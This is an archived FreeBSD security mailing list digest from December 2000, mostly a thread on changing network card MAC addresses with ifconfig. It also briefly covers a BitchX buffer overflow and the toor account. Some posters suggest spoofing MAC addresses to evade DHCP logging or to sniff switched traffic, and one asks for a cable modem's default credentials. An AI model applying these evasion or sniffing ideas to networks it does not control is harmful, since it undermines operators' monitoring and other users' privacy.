From owner-freebsd-security Sun Dec 10 4:37: 5 2000
Date: Sun, 10 Dec 2000 14:36:54 +0200 (IST)
From: Roman Shterenzon
Subject: Buffer vulnerability in BitchX irc client

Hi,
Apparently securityfocus has some information about this:
http://www.securityfocus.com/bid/2087

There are some explanations in the helot.c - the exploit.

P.S. Maintainer, can you hear me? :)

--Roman Shterenzon, UNIX System Administrator and Consultant
[ Xpert UNIX Systems Ltd., Herzlia, Israel.
Tel: +972-9-9522361 ]

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Dec 10 5:43: 5 2000
Date: Sun, 10 Dec 2000 08:40:11 -0500
From: Bill Vermillion
To: freebsd-security@freebsd.org
Subject: Re: security-digest V4 #824
Reply-To: bv@bilver.wjv.com

On Sat, Dec 09, 2000 at 11:36:08PM -0800, security-digest thus spoke:

> ------------------------------
> Date: Fri, 8 Dec 2000 10:04:51 -0500 (Eastern Standard Time)
> From: Forrest Houston
> Subject: RE: toor account

> Personally I've found the toor account helpful on "shared"
> machines. So if there is a group that has primary sysadmin
> responsibility for the machine they get the root password.
> However as the network admin there might be times things need to
> change/fix something so the netadmin has the toor password. That
> way each group can use their own password schemes, which will also
> hopefully eliminate the need for password lists.

I'd say that buys you absolutely nothing except a false sense of
security.
The user ID and group ID of root and toor are identical. Same
account with two names. All anyone with the toor account has to
do is type passwd toor and they can change it.

Really only good - in my view [which may be a very limited view]
for something that needs to be run under Bourne shell syntax
instead of csh without spawning a new shell. Since I'm a Bourne
shell user from systems of long ago that had no c-shell for them,
I used the Korn shell for root.

--
Bill Vermillion - bv @ wjv . com

From owner-freebsd-security Sun Dec 10 8:21:16 2000
From: Carl Johan Madestrand
Date: Sun, 10 Dec 2000 17:20:51 +0100
To: Roman Shterenzon
Subject: Re: Buffer vulnerability in BitchX irc client

On Sunday 10 December 2000 13:36, Roman Shterenzon wrote:
> Hi,
> Apparently securityfocus has some information about this:
> http://www.securityfocus.com/bid/2087
>
> There are some explanations in the helot.c - the exploit.
>
> P.S. Maintainer, can you hear me? :)
>
> --Roman Shterenzon, UNIX System Administrator and Consultant
> [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ]

I hear you.
I received a patch for misc.c today from someone which apparently is
supposed to fix the problem.

--
Carl Johan Madestrand
LoRd_CJ on IRC

From owner-freebsd-security Sun Dec 10 9:49:55 2000
Date: Sun, 10 Dec 2000 11:42:47 -0600 (CST)
From: Matt Watson
To: Roman Shterenzon
Cc: freebsd-security@FreeBSD.ORG, cj@vallcom.net
Subject: Re: Buffer vulnerability in BitchX irc client

This bug is already known to the bitchx coders and has already been
patched in the CVS. Shortly i will be posting the patches for 75p3 and
1.0c17 on www.bitchx.org and ftp.bitchx.org as soon as i get my hands on
them. I'm not the maintainer of the port but I do run the bitchx.org
sites, so, should the port be downloading from ftp.bitchx.org there will
be no need to include a special patch in the port.

--
Matt Watson
TeraHertz Communications

On Sun, 10 Dec 2000, Roman Shterenzon wrote:

> Hi,
> Apparently securityfocus has some information about this:
> http://www.securityfocus.com/bid/2087
>
> There are some explanations in the helot.c - the exploit.
>
> P.S. Maintainer, can you hear me? :)
>
> --Roman Shterenzon, UNIX System Administrator and Consultant
> [ Xpert UNIX Systems Ltd., Herzlia, Israel.
> Tel: +972-9-9522361 ]

From owner-freebsd-security Sun Dec 10 17:55:54 2000
From: "David Erickson"
Subject: MAC Address
Date: Sun, 10 Dec 2000 20:56:03 -0500

Is it possible to change the MAC address on a NIC through ifconfig or any
other means or do I have to get a specific NIC that supports this
functionality?
Dave Erickson

From owner-freebsd-security Sun Dec 10 20: 2:36 2000
Date: Sun, 10 Dec 2000 20:03:40 -0800
From: kris@citusc.usc.edu
To: Matt Watson
Cc: Roman Shterenzon, freebsd-security@FreeBSD.ORG, cj@vallcom.net
Subject: Re: Buffer vulnerability in BitchX irc client

On Sun, Dec 10, 2000 at 11:42:47AM -0600, Matt Watson wrote:
> This bug is already known to the bitchx coders and has already been
> patched in the CVS. Shortly i will be posting the patches for 75p3 and
> 1.0c17 on www.bitchx.org and ftp.bitchx.org as soon as i get my hands on
> them. I'm not the maintainer of the port but I do run the bitchx.org
> sites, so, should the port be downloading from ftp.bitchx.org there will
> be no need to include a special patch in the port.

Please don't modify an already released version without changing the
version number - it will change the MD5 checksum for a start, so the
port will no longer build, and makes more work for port maintainers
when they have to go into the distfile and compare it with the old
version to find out what changed.
Kris

From owner-freebsd-security Sun Dec 10 20: 9: 4 2000
Date: Sun, 10 Dec 2000 23:08:47 -0500 (EST)
From: Will Mitayai Keeso Rowe
To: David Erickson
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: MAC Address

Dave,

I'm sure you could work it out, but i'm curious as to why you would want
to do this? A MAC address provides a necessary function in its sequences
of set prefixes and its sequence of unique suffixes.

-Mit

---
Will Mitayai Keeso Rowe
Toronto, Ontario, Canada
mitayai@dreaming.org

On Sun, 10 Dec 2000, David Erickson wrote:

> Is it possible to change the MAC address on a NIC through ifconfig or any
> other means or do I have to get a specific NIC that supports this
> functionality?
>
> Dave Erickson

From owner-freebsd-security Sun Dec 10 20:14:16 2000
Date: Sun, 10 Dec 2000 23:14:02 -0500 (EST)
From: Mikhail Kruk
To: Will Mitayai Keeso Rowe
Cc: David Erickson
Subject: Re: MAC Address

I'd want to do it because at our university there are plugs for laptops on
DHCP network, but DHCP server knows everyone's MAC address so all my
activity is logged when I use it. Changing my MAC address would open some
interesting possibilities.
From a purely theoretical point of view, of course.

> Dave,
>
> I'm sure you could work it out, but i'm curious as to why you would want
> to do this? A MAC address provides a necessary function in its sequences
> of set prefixes and its sequence of unique suffixes.
>
> -Mit
>
> ---
> Will Mitayai Keeso Rowe
> Toronto, Ontario, Canada
> mitayai@dreaming.org
>
> On Sun, 10 Dec 2000, David Erickson wrote:
>
> > Is it possible to change the MAC address on a NIC through ifconfig or any
> > other means or do I have to get a specific NIC that supports this
> > functionality?
> >
> > Dave Erickson

From owner-freebsd-security Sun Dec 10 20:16:56 2000
From: "Jeff Fulton"
To: "Will Mitayai Keeso Rowe", "David Erickson"
Subject: Re: MAC Address
Date: Mon, 11 Dec 2000 15:27:57 +1100

Maybe to masquerade as another address to fool a dhcp server or even a
license server. Some of the cable networks register your mac address and
won't allow you to connect from a different address, unless you call them
up and ask to get it changed.
There have also been a few nasty manufacturing events over the years when a
whole batch of cards got sent out all with identical mac addresses.

Regards,
Jeff Fulton

----- Original Message -----
From: "Will Mitayai Keeso Rowe"
To: "David Erickson"
Sent: Monday, December 11, 2000 3:08 PM
Subject: Re: MAC Address

> Dave,
>
> I'm sure you could work it out, but i'm curious as to why you would want
> to do this? A MAC address provides a necessary function in its sequences
> of set prefixes and its sequence of unique suffixes.
>
> -Mit
>
> ---
> Will Mitayai Keeso Rowe
> Toronto, Ontario, Canada
> mitayai@dreaming.org
>
> On Sun, 10 Dec 2000, David Erickson wrote:
>
> > Is it possible to change the MAC address on a NIC through ifconfig or any
> > other means or do I have to get a specific NIC that supports this
> > functionality?
> >
> > Dave Erickson

From owner-freebsd-security Sun Dec 10 20:17:59 2000
Date: Sun, 10 Dec 2000 22:17:48 -0600 (CST)
From: Mike Silbersack
To: David Erickson
Cc: freebsd-security@freebsd.org
Subject: Re: MAC Address

On Sun, 10 Dec 2000, David Erickson wrote:

> Is it possible to change the MAC address on a NIC through ifconfig or any
> other means or do I have to get a specific NIC that supports this
> functionality?
>
> Dave Erickson

Someone had written a utility called setmac which used a KLD and utility
program to do this under freebsd 3.x. I used it for a little while
last year, and it worked well. You should be able to find it by doing a
search of the mailing lists. (If the search engine's working. If you
can't find it, e-mail me and I'll see if I still have it sitting around.)

Mike "Silby" Silbersack

From owner-freebsd-security Sun Dec 10 20:22:35 2000
To: freebsd-security@FreeBSD.ORG
Subject: Re: MAC Address
In-Reply-To: Your message of "Sun, 10 Dec 2000 22:17:48 MDT."
Date: Mon, 11 Dec 2000 15:22:26 +1100
From: Tony Landells

> Someone had written a utility called setmac which used a KLD and utility
> program to do this under freebsd 3.x. I used it for a little while
> last year, and it worked well. You should be able to find it by doing a
> search of the mailing lists. (If the search engine's working. If you
> can't find it, e-mail me and I'll see if I still have it sitting around.)

Or if you're on 4.2 or later you could use:

        ifconfig ether lladdr

where you replace the and with your information.

Tony
--
Tony Landells
Senior Network Engineer
Ph: +61 3 9677 9319
Australian Clearing Services Pty Ltd
Fax: +61 3 9677 9355
Level 4, Rialto North Tower
525 Collins Street
Melbourne VIC 3000
Australia

From owner-freebsd-security Sun Dec 10 20:27:35 2000
Date: Sun, 10 Dec 2000 23:27:22 -0500
From: Daniel Hauer
To: freebsd-security@freebsd.org
Subject: Re: MAC Address

Mikhail Kruk wrote:
>
> I'd want to do it because at our
> university there are plugs for laptops on
> DHCP network, but DHCP server knows everyone's MAC address so all my
> activity is logged when I use it. Changing my MAC address would open some
> interesting possibilities.
> From a purely theoretical point of view, of course.
>
> > Dave,

Sounds to me all this is just_slightly_unethical_if
_not_bordering_on_illegal. This is a topic for a security mailing list?
I thought we were here to boost network security, not circumvent it.
Just a network technician's opinion.

--
Regards,
Daniel Hauer.
http://www.enter.net
"The Road To The Internet Starts There!"
***************************************************************************
Windoze is for GAMES, UNIX is for the rest of us.

UNIX is like the sights on a loaded gun. If you aim the gun at your foot
and pull the trigger, it is the basic function of UNIX to accurately
deliver the bullet from the gun to the target. In this case, it's your
foot.
***************************************************************************

From owner-freebsd-security Sun Dec 10 20:28: 4 2000
Date: Mon, 11 Dec 2000 13:20:26 +0900 (JST)
To: mitayai@dreaming.org
Cc: erickson@mddsg.com, freebsd-security@FreeBSD.ORG
Subject: Re: MAC Address
From: sen_ml@eccosys.com

From: Will Mitayai Keeso Rowe
Subject: Re: MAC Address
Date: Sun, 10 Dec 2000 23:08:47 -0500 (EST)

> I'm sure you could work it out, but i'm curious as to why you would want
> to do this? A MAC address provides a necessary function in its sequences
> of set prefixes and its sequence of unique suffixes.

well, i'd want to do it so that my mac address doesn't leak when using
implementations of ipv6 -- afaict, "privacy-considering" address
allocation hasn't been implemented widely (perhaps because it's still
in draft form?).

From owner-freebsd-security Sun Dec 10 20:34:16 2000
Date: Sun, 10 Dec 2000 23:34:07 -0500
From: Peter Radcliffe
To: freebsd-security@freebsd.org
Subject: Re: MAC Address
Reply-To: freebsd-security@freebsd.org

Daniel Hauer probably said:
> Sounds to me all this is just_slightly_unethical_if
> _not_bordering_on_illegal. This is a topic for a security mailing list?
> I thought we were here to boost network security, not circumvent it.
> Just a network technician's opinion.

Several OSes allow you to change the ethernet address, and there are
several legitimate reasons for needing to. It's a feature I use in
testing, to fix broken cards, use "virtual" mac addresses (especially
useful for cable modem companies that charge money to change the
registered mac address), etc.

It's a question for -questions, but it's already been answered here
(an option to ifconfig in 4.*). Can we drop it now ?

P.

--
pir pir@pir.net pir@net.tufts.edu

From owner-freebsd-security Sun Dec 10 20:34:23 2000
Date: Sun, 10 Dec 2000 23:34:16 -0500 (EST)
From: Mikhail Kruk
To: Daniel Hauer
Subject: Re: MAC Address

> Mikhail Kruk wrote:
> >
> > I'd want to do it because at our university there are plugs for laptops on
> > DHCP network, but DHCP server knows everyone's MAC address so all my
> > activity is logged when I use it.
> > Changing my MAC address would open some
> > interesting possibilities.
> > From a purely theoretical point of view, of course.
> >
> > > Dave,
>
>
> Sounds to me all this is just_slightly_unethical_if
> _not_bordering_on_illegal. This is a topic for a security mailing list?
> I thought we were here to boost network security, not circumvent it.
> Just a network technician's opinion.

I said "purely theoretical" and I meant it.
However I'm seriously confused now. Is it really possible to change MAC
address from software as people say here? Isn't the whole point of MAC
address just the opposite?

From owner-freebsd-security Sun Dec 10 20:36:11 2000
Date: Sun, 10 Dec 2000 22:36:05 -0600 (CST)
From: Mike Silbersack
To: Tony Landells
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: MAC Address

On Mon, 11 Dec 2000, Tony Landells wrote:

> Or if you're on 4.2 or later you could use:
>
> ifconfig ether lladdr
>
> where you replace the and with your information.
>
> Tony

Ah, neat. That'll be a nice timesaver if I need to change MAC addresses
again.
Thanks,

Mike "Silby" Silbersack

From owner-freebsd-security Sun Dec 10 20:55:31 2000
Date: Sun, 10 Dec 2000 22:55:29 -0600
From: Bill Fumerola
To: Daniel Hauer
Cc: freebsd-security@freebsd.org
Subject: Re: MAC Address

On Sun, Dec 10, 2000 at 11:27:22PM -0500, Daniel Hauer wrote:

> Sounds to me all this is just_slightly_unethical_if
> _not_bordering_on_illegal. This is a topic for a security mailing list?
> I thought we were here to boost network security, not circumvent it.
> Just a network technician's opinion.

Most of the time discussions on how to circumvent security result
in better ways to boost it.

--
Bill Fumerola - security yahoo / Yahoo! inc.
- fumerola@yahoo-inc.com / billf@FreeBSD.org

From owner-freebsd-security Sun Dec 10 21: 8: 0 2000
Date: Sun, 10 Dec 2000 21:07:47 -0800
From: "Crist J. Clark"
To: Mikhail Kruk
Cc: Daniel Hauer, freebsd-security@FreeBSD.ORG
Subject: Re: MAC Address
Reply-To: cjclark@alum.mit.edu

On Sun, Dec 10, 2000 at 11:34:16PM -0500, Mikhail Kruk wrote:
> > Mikhail Kruk wrote:
> > >
> > > I'd want to do it because at our university there are plugs for laptops on
> > > DHCP network, but DHCP server knows everyone's MAC address so all my
> > > activity is logged when I use it. Changing my MAC address would open some
> > > interesting possibilities.
> > > From a purely theoretical point of view, of course.
> > >
> > > > Dave,
> >
> >
> > Sounds to me all this is just_slightly_unethical_if
> > _not_bordering_on_illegal. This is a topic for a security mailing list?
> > I thought we were here to boost network security, not circumvent it.
> > Just a network technician's opinion.
>
> I said "purely theoretical" and I meant it.
> However I'm seriously confused now. Is it really possible to change MAC
> address from software as people say here?

Of course. An Ethernet frame is just some bits sent out on a wire. If
you can write raw frames to the wire, you can use whatever MAC address
you want. And think about it, how would bridging work if you couldn't
do this?

> Isn't the whole point of MAC
> address just the opposite?

The whole point of hardware MAC addresses is that there is a unique
address always available. It might not be used.

Note that different systems do this in different ways. PC hardware
needs a MAC on the card since there is no dependable unique value on
other parts of the system (and for some reason people resist that
coming about, remember the PIII). Other hardware may work
differently. For example, on a Sun machine, the unique machine ID is
used to generate the MAC. All interfaces on a Sun box will have the
same MAC in a default setup.

--
Crist J.
Clark cjclark@alum.mit.edu

From owner-freebsd-security Sun Dec 10 21:33:28 2000
Date: Sun, 10 Dec 2000 23:33:20 -0600 (CST)
From: David Talkington
To: freebsd-security@FreeBSD.ORG
Subject: Re: MAC Address
In-Reply-To: <3A3457AA.7507D386@enter.net>

Daniel Hauer wrote:

>
>Sounds to me all this is just_slightly_unethical_if
>_not_bordering_on_illegal. This is a topic for a security mailing list?
>I thought we were here to boost network security, not circumvent it.

Knowing the ways in which the administrator's intent might be
circumvented is the path to secure systems, and is therefore valuable
information.
-d

From owner-freebsd-security Sun Dec 10 21:36: 6 2000
Message-ID: <001801c06334$3bcfd7a0$cc02a8c0@columbia.mentis.org>
From: "David Erickson"
To: "Jeff Fulton", "Will Mitayai Keeso Rowe"
References: <01ee01c0632a$bdffad40$9214a8c0@plasmo>
Subject: Re: MAC Address
Date: Mon, 11 Dec 2000 00:35:55 -0500

Exactly. My cablemodem can be moved to another machine by resetting it. But
once communication has started with that MAC address it will not listen.
Implementing VRRP won't do what I want because it still sees the MAC address
of the primary machine's nic, not the vrrp mac address. But I'm trying to put
in place a little redundancy and the only way I can come up with is by
monitoring on a separate ethernet crossover between machines and when it
stops responding to traffic over that link then I would assume the other
machine's MAC address. Similar to VRRP with the VRRP mac address being
shared between multiple machines but only one machine using it at a time as
the gateway.

Dave

----- Original Message -----
From: "Jeff Fulton"
To: "Will Mitayai Keeso Rowe"; "David Erickson"
Sent: Sunday, December 10, 2000 11:27 PM
Subject: Re: MAC Address

> Maybe to masquerade as another address to fool a dhcp server or even a
> license server.
> Some of the cable networks register your mac address and won't allow you to
> connect from a different address, unless you call them up and ask to get it
> changed.
> There have also been a few nasty manufacturing events over the years when a
> whole batch of cards got sent out all with identical mac addresses.
>
> Regards,
> Jeff Fulton
>
>
> ----- Original Message -----
> From: "Will Mitayai Keeso Rowe"
> To: "David Erickson"
> Sent: Monday, December 11, 2000 3:08 PM
> Subject: Re: MAC Address
>
>
> > Dave,
> >
> > I'm sure you could work it out, but i'm curious as why you would want
> > to do this? A MAC address provides a necessary function in its sequences
> > of set prefixes and its sequence of unique suffixes.
> >
> > -Mit
> >
> >
> > ---
> > Will Mitayai Keeso Rowe
> > Toronto, Ontario, Canada
> > mitayai@dreaming.org
> >
> > On Sun, 10 Dec 2000, David Erickson wrote:
> >
> > > Is it possible to change the MAC address on a NIC through ifconfig or any
> > > other means or do I have to get a specific NIC that supports this
> > > functionality?
> > >
> > > Dave Erickson

From owner-freebsd-security Sun Dec 10 21:39:18 2000
Message-ID: <004001c06334$b2e9f460$cc02a8c0@columbia.mentis.org>
From: "David Erickson"
To: "Tony Landells"
References: <200012110422.PAA23401@tungsten.austclear.com.au>
Subject: Re: MAC Address
Date: Mon, 11 Dec 2000 00:39:15 -0500

Thanks. I will look into this since I was planning on upgrading soon
anyhow ;-)

Dave

----- Original Message -----
From: "Tony Landells"
Sent: Sunday, December 10, 2000 11:22 PM
Subject: Re: MAC Address

> > Someone had written a utility called setmac which used a KLD and utility
> > program to do this under freebsd 3.x. I used it for a little while
> > last year, and it worked well. You should be able to find it by doing a
> > search of the mailing lists.
(If the search engine's working. If you
> > can't find it, e-mail me and I'll see if I still have it sitting around.)
>
> Or if you're on 4.2 or later you could use:
>
> ifconfig ether lladdr
>
> where you replace the and with your information.
>
> Tony
> --
> Tony Landells
> Senior Network Engineer Ph: +61 3 9677 9319
> Australian Clearing Services Pty Ltd Fax: +61 3 9677 9355
> Level 4, Rialto North Tower
> 525 Collins Street
> Melbourne VIC 3000
> Australia

From owner-freebsd-security Sun Dec 10 21:43:33 2000
Message-ID: <005801c06335$4b35afc0$cc02a8c0@columbia.mentis.org>
From: "David Erickson"
To: "Daniel Hauer"
References: <3A3457AA.7507D386@enter.net>
Subject: Re: MAC Address
Date: Mon, 11 Dec 2000 00:43:31 -0500

----- Original Message -----
From: "Daniel Hauer"
Sent: Sunday, December 10, 2000 11:27 PM
Subject: Re: MAC Address

> Mikhail Kruk wrote:
> >
> > I'd want to do it because at our university there are plugs for laptops on
> > DHCP network, but DHCP server knows everyone's MAC address so all my
> > activity is logged when I use it. Changing my MAC address would open some
> > interesting possibilities.
> > From a purely theoretical point of view, of course.
> >
> > > Dave,
>
>
> Sounds to me all this is just_slightly_unethical_if
> _not_bordering_on_illegal. This is a topic for a security mailing list?
> I thought we were here to boost network security, not circumvent it.
> Just a network technician's opinion.

How is it unethical to change one's MAC address? First of all a MAC address
is only used on your local LAN segment. MAC Addresses do not traverse over
IP. Once your traffic hits a router the traffic is then relayed. ARP is
used on individual segments to locate the MAC address that is answering for
certain IPs. I just want to implement some redundancy on my cablemodem for
some of the services I provide. Thus if I have a way to replace the MAC
address like I can on Nokia's IPSO 3.2.1 or Sun or HP 9000's on PC hardware
then I can have an entirely different standby machine assume that MAC
address if it doesn't hear an answer from the other machine.

>
> --
> Regards,
> Daniel Hauer.
> http://www.enter.net "The Road To The Internet Starts There!"
> ***************************************************************************
> Windoze is for GAMES, UNIX is for the rest of us.
> UNIX is like the sights on a loaded gun. If you aim the gun
> at your foot and pull the trigger, it is the basic function of
> UNIX to accurately deliver the bullet from the gun to the
> target. In this case, it's your foot.
> ***************************************************************************

From owner-freebsd-security Sun Dec 10 21:51:55 2000
Message-ID: <001201c06336$aecd5550$aa240018@cx443070b>
From: "Jeremiah Gowdy"
To: "David Erickson", "Jeff Fulton", "Will Mitayai Keeso Rowe"
References: <01ee01c0632a$bdffad40$9214a8c0@plasmo> <001801c06334$3bcfd7a0$cc02a8c0@columbia.mentis.org>
Subject: DHCP beats MAC Address
Date: Sun, 10 Dec 2000 21:53:26 -0800

----- Original Message -----
From: "David Erickson"
To: "Jeff Fulton"; "Will Mitayai Keeso Rowe"
Sent: Sunday, December 10, 2000 9:35 PM
Subject: Re: MAC Address

> Exactly. My cablemodem can be moved to another machine by resetting it. But
> once communication has started with that MAC address it will not listen.
> Implementing VRRP won't do what I want because it still sees the MAC address
> of the primary machine's nic, not the vrrp mac address.
But I'm trying to put
> in place a little redundancy and the only way I can come up with is by
> monitoring on a separate ethernet crossover between machines and when it
> stops responding to traffic over that link then I would assume the other
> machine's MAC address. Similar to VRRP with the VRRP mac address being
> shared between multiple machines but only one machine using it at a time as
> the gateway.
>
> Dave

Indeed, the cable modem does remember your MAC address, HOWEVER, rather than
resetting it, if you use DHCP, and you're using one of the services like
@Home that has an account number for the address, like CX13245125-A, then
the second computer to DHCP with the account number gets the address without
resetting. So when I'm done using my desktop computer, and I plug in my
laptop, the laptop DHCPs with the same account number, and gets the IP
without resetting and resyncing. Of course my desktop computer has to be
off, because it still has a valid DHCP lease on the IP.

From owner-freebsd-security Sun Dec 10 21:58:54 2000
Message-ID: <002a01c06337$c005f1a0$aa240018@cx443070b>
From: "Jeremiah Gowdy"
To: "Daniel Hauer"
References: <3A3457AA.7507D386@enter.net>
Subject: Re: MAC Address
Date: Sun, 10 Dec 2000 22:01:05 -0800

> > I'd want to do it because at our university there are plugs for laptops on
> > DHCP network, but DHCP server knows everyone's MAC address so all my
> > activity is logged when I use it. Changing my MAC address would open some
> > interesting possibilities.
>
> Sounds to me all this is just_slightly_unethical_if
> _not_bordering_on_illegal. This is a topic for a security mailing list?
> I thought we were here to boost network security, not circumvent it.
> Just a network technician's opinion.

Illegal or unethical to mess with IP/DHCP/MAC configuration on a network?
So, if I connect to a public network and bind someone else's IP address,
should I be punished? Is that evil? Come on. I'm a network admin, and
even I don't take it that seriously. If someone on my network evades my
logging somehow, then that violates my Terms of Service, and if I'm smart
enough to detect them, I shut them down, and maybe ban them from the
network. If I don't detect them, more power to them. I happen to be one of
the people who think the burden of security is on the administrator to make
the system secure, and not on the "hacker" (or whatever your favorite term
is) to be nice enough not to exploit my network.

How do you think network security is "boosted"? By people not "hacking"
things? No offense, just this network administrator's opinion. If you're
into network security, but you're not into a little hacking (your own system
or someone else's), then you're not exactly seeing the whole picture.
Security flaws are *often* fixed because someone exploits them. I'm not
advocating abusing people's systems, but there's a certain amount of
Necessary Evil that has to be done.

From owner-freebsd-security Sun Dec 10 21:59:19 2000
Date: Mon, 11 Dec 2000 00:59:15 -0500
From: Peter Radcliffe
To: freebsd-security@FreeBSD.ORG
Subject: Re: DHCP beats MAC Address
Message-ID: <20001211005915.D9158@pir.net>
Reply-To: freebsd-security@freebsd.org
References: <01ee01c0632a$bdffad40$9214a8c0@plasmo> <001801c06334$3bcfd7a0$cc02a8c0@columbia.mentis.org> <001201c06336$aecd5550$aa240018@cx443070b>
In-Reply-To: <001201c06336$aecd5550$aa240018@cx443070b>; from data@irev.net on Sun, Dec 10, 2000 at 09:53:26PM -0800

Jeremiah Gowdy probably said:
> Indeed, the cable modem does remember your MAC address, HOWEVER, rather than
> resetting it, if you use DHCP, and you're using one of the services like
> @Home that has an account number for the address, like CX13245125-A, then
> the second computer to DHCP with the account number gets the address without

Every cable modem I've seen in the US, although I have not seen the
@home ones, filters on MAC addresses and only allows N through (where
N is normally one or you pay for more). The cable modem lets through
the first N MAC addresses it sees.

In this case you have no choice but to reset the modem or change the
MAC address.

This has been hashed through on several FreeBSD lists before.

P.

--
pir pir@pir.net pir@net.tufts.edu

From owner-freebsd-security Sun Dec 10 22:15:39 2000
Date: Mon, 11 Dec 2000 01:15:35 -0500 (EST)
From: Mitch Collinsworth
To: freebsd-security@FreeBSD.ORG
Subject: Re: DHCP beats MAC Address
In-Reply-To: <20001211005915.D9158@pir.net>

On Mon, 11 Dec 2000, Peter Radcliffe wrote:

> Jeremiah Gowdy probably said:
> > Indeed, the cable modem does remember your MAC address, HOWEVER, rather than
> > resetting it, if you use DHCP, and you're using one of the services like
> > @Home that has an account number for the address, like CX13245125-A, then
> > the second computer to DHCP with the account number gets the address without
>
> Every cable modem I've seen in the US, although I have not seen the
> @home ones, filters on MAC addresses and only allows N through (where
> N is normally one or you pay for more).
The cable modem lets through
> the first N MAC addresses it sees.
>
> In this case you have no choice but to reset the modem or change the
> MAC address.
>
> This has been hashed through on several FreeBSD lists before.

Well like you said you haven't seen the @home setup. Jeremiah's
description matches my experience with @home. You can use multiple
systems (i.e. mac addresses) without resetting the cable modem, but
you have to re-use the account #.

-Mitch

From owner-freebsd-security Sun Dec 10 22:25: 5 2000
Date: Mon, 11 Dec 2000 01:25:02 -0500
From: Peter Radcliffe
To: freebsd-security@FreeBSD.ORG
Subject: Re: DHCP beats MAC Address
Message-ID: <20001211012502.E9158@pir.net>
Reply-To: freebsd-security@freebsd.org
References: <20001211005915.D9158@pir.net>

Mitch Collinsworth probably said:
> Well like you said you haven't seen the @home setup. Jeremiah's
> description matches my experience with @home. You can use multiple
> systems (i.e. mac addresses) without resetting the cable modem, but
> you have to re-use the account #.

My point was that not all cable modems operate in the same way, as
was being implied.

I repeat, this has been hashed through several times before and has
nothing to do with freebsd or security.

P.

--
pir pir@pir.net pir@net.tufts.edu

From owner-freebsd-security Mon Dec 11 3:59: 2 2000
Date: Mon, 11 Dec 2000 09:16:52 +0200 (IST)
From: Roman Shterenzon
To: David Erickson
Subject: Re: MAC Address
In-Reply-To: <005801c06335$4b35afc0$cc02a8c0@columbia.mentis.org>

On Mon, 11 Dec 2000, David Erickson wrote:

> > Sounds to me all this is just_slightly_unethical_if
> > _not_bordering_on_illegal. This is a topic for a security mailing list?
> > I thought we were here to boost network security, not circumvent it.
> > Just a network technician's opinion.
>
> How is it unethical to change one's MAC address? First of all a MAC address
> is only used on your local LAN segment. MAC Addresses do not traverse over
> IP. Once your traffic hits a router the traffic is then relayed.
ARP is

The most interesting question is if I know some mac address on a switched
network and then I set my mac address to this address, if some switches
_will_ deliver packets to me as well? It might be interesting sniffing
strategy on a switched network if some switches work this way.
Thoughts?

--Roman Shterenzon, UNIX System Administrator and Consultant
[ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ]

From owner-freebsd-security Mon Dec 11 4: 0: 3 2000
Message-ID: <3A3489D4.100E8B41@dsms.com>
Date: Mon, 11 Dec 2000 00:01:24 -0800
From: harold barker
Reply-To: hvb@dsms.com
Organization: Dark Side of the Moon SoftWare
To: "freebsd-security@FreeBSD.ORG"
Subject: RCA cable modem

Anyone care to share the default ip address and password that @home uses for
the RCA modems. I am looking to grab the stats, so that I can help the
clueless tech when mine goes down.

From owner-freebsd-security Mon Dec 11 4: 8:52 2000
To: "David Erickson"
Subject: Re: MAC Address
References: <000701c06315$84e46ec0$cc02a8c0@columbia.mentis.org>
From: Dag-Erling Smorgrav
Date: 11 Dec 2000 10:08:48 +0100
In-Reply-To: "David Erickson"'s message of "Sun, 10 Dec 2000 20:56:03 -0500"

"David Erickson" writes:
> Is it possible to change the MAC address on a NIC through ifconfig or any
> other means or do I have to get a specific NIC that supports this
> functionality?

'man ifconfig'

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Mon Dec 11 4:44:24 2000
Message-ID: <020401c06370$1ca77f40$2001a8c0@amoeba>
From: "Jeff Fulton"
To: "Roman Shterenzon", "David Erickson"
Subject: Re: MAC Address
Date: Mon, 11 Dec 2000 23:44:30 +1100

The switch learns your location when it processes a packet sent by you.
Once you're in the station cache, you'll get timed out if you don't send
anything for a minute or two. If a rogue duplicate sends something, the
station cache will be modified to point to him. Of course, it may change
straight back if the real owner transmits something again.

I don't think both the rogue and the duplicate can be in the station cache
at the same time.

Regards,
jeff Fulton

----- Original Message -----
From: "Roman Shterenzon"
To: "David Erickson"
Sent: Monday, December 11, 2000 6:16 PM
Subject: Re: MAC Address

> On Mon, 11 Dec 2000, David Erickson wrote:
>
> > > Sounds to me all this is just_slightly_unethical_if
> > > _not_bordering_on_illegal. This is a topic for a security mailing list?
> > > I thought we were here to boost network security, not circumvent it.
> > > Just a network technician's opinion.
> >
> > How is it unethical to change one's MAC address? First of all a MAC address
> > is only used on your local LAN segment. MAC Addresses do not traverse over
> > IP. Once your traffic hits a router the traffic is then relayed. ARP is
>
> The most interesting question is if I know some mac address on a switched
> network and then I set my mac address to this address, if some switches
> _will_ deliver packets to me as well? It might be interesting sniffing
> strategy on a switched network if some switches work this way.
> Thoughts?
>
> --Roman Shterenzon, UNIX System Administrator and Consultant
> [ Xpert UNIX Systems Ltd., Herzlia, Israel.
Tel: +972-9-9522361 ]

From owner-freebsd-security Mon Dec 11 4:58: 2 2000
Message-ID: <001001c06371$ece41a00$cc02a8c0@columbia.mentis.org>
From: "David Erickson"
To: "Jeff Fulton", "Roman Shterenzon"
References: <020401c06370$1ca77f40$2001a8c0@amoeba>
Subject: Re: MAC Address
Date: Mon, 11 Dec 2000 07:57:32 -0500

On a cisco switch the proper way to get around that would be to have the
original and its duplicate on spanning ports for each other; that way the
switch wouldn't care, it would always send the packets to both ports and only
one would respond at any given time. But fortunately I don't have to worry
about that because I have a stupid Netgear switch at home which really seems
to not care what I do mac address wise. It picks up on the changes almost
instantly.
